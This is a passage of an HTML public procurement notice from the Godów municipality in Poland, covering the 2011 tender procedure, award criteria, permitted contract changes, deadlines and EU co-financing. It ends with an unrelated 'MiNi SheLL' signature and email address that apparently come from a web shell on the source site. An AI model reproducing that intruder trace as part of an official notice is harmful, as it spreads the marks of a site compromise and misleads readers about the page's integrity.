4. Oświadczenie o wymaganym okresie gwarancji - minimum 36 miesięcy.
5. Pełnomocnictwo względnie dokument z Krajowego Rejestru Sądowego lub zaświadczenie  o wpisie do ewidencji działalności gospodarczej wskazujące sposób i zakres umocowania wykonawców.
Pełnomocnictwo musi być złożone w formie oryginału lub kserokopii poświadczonej notarialnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza zmianę terminu realizacji przedmiotu Umowy w przypadku:
a. Wystąpienia okoliczności niezależnych od Wykonawcy skutkujących niemożliwością dotrzymania terminu określonego w § 3 Umowy. Termin ten może ulec przedłużeniu, 	nie dłużej jednak niż o czas trwania tych okoliczności.
b. Wystąpienia robót dodatkowych, nieobjętych zamówieniem podstawowym,	niezbędnych do jego prawidłowego wykonania, których wykonanie stało się	konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia, jeżeli:
1) z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub
2) wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego, a wykonanie zamówienia dodatkowego uniemożliwia wykonanie zamówienia podstawowego w terminie umownym,
c. Opóźnień w przekazaniu przez Zamawiającego terenu budowy w terminie	określonym w umowie.
d. Opóźnień Zamawiającego w przekazaniu Wykonawcy dokumentów budowy	(pozwolenia na budowę, dokumentacji projektowej, specyfikacji technicznych,	innych wymaganych przepisami, do których przekazania Zamawiający był	zobowiązany).
e. Wstrzymania przez Zamawiającego bądź inne uprawnione jednostki wykonywania 	robót chyba, że wstrzymanie robót nastąpiło z winy Wykonawcy.
2. We wszystkich przypadkach określonych w punkcie 1, termin realizacji może ulec przedłużeniu, nie dłużej jednak niż o czas trwania występujących okoliczności.
3. Zamawiający dopuszcza zmianę kierownika budowy, przedstawionego w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptując nowego kierownika budowy, w przypadku, gdy:
a. Wykonawca z własnej inicjatywy proponuje zmianę kierownika budowy w następujących przypadkach:
1) śmierci, choroby lub innych zdarzeń losowych dotyczących kierownika budowy,
2) nie wywiązywania się kierownika budowy z obowiązków wynikających z umowy,
3) jeżeli zmiana kierownika budowy stanie się konieczna z jakichkolwiek przyczyn niezależnych od Wykonawcy (np. rezygnacji),
b. Zamawiający może zażądać od wykonawcy zmiany kierownika budowy, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy. Wykonawca 	zobowiązany jest zmienić kierownika budowy zgodnie z żądaniem Zamawiającego 	we wskazanym przez Zamawiającego terminie.
4. W przypadku zmiany kierownika budowy, w przypadkach określonych w punkcie 3, nowy kierownik budowy musi spełniać wymagania określone w SIWZ dla danego specjalisty pkt. 6.2 SIWZ.
5. Zmiana podwykonawców : w przypadku wprowadzenia podwykonawcy, wprowadzenia nowego (kolejnego) podwykonawcy, rezygnacji z podwykonawcy, zmiany wartości lub zakresu robót wykonywanych przez podwykonawcę, Zamawiający może wyrazić zgodę na powyższe po zaakceptowaniu umowy Wykonawcy z podwykonawca wraz z częścią dokumentacji dot. wykonania robót określonych w umowie, w terminie 14 dni od przekazania umowy przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.godow.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
ul.1 Maja 53
44-340 Godów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2011 godzina 10:00, miejsce: Urząd Gminy
ul.1 Maja 53
44-340 Godów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Złożono wniosek o dofinansowanie zadania w ramach działania 413 Wdrażanie Lokalnych Strategii Rozwoju dla operacji które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi. Wnioskowana kwota pomocy 290.565 zł..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com